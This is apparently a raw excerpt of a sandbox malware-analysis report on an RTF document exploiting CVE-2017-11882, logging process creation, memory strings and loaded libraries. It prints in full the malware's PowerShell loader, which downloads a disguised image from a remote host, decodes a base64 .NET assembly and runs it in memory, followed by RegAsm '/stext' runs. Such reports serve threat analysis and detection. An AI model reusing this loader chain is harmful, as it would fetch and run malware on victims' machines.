                  Source: RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfVirustotal: Detection: 53%
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfReversingLabs: Detection: 47%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ?Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
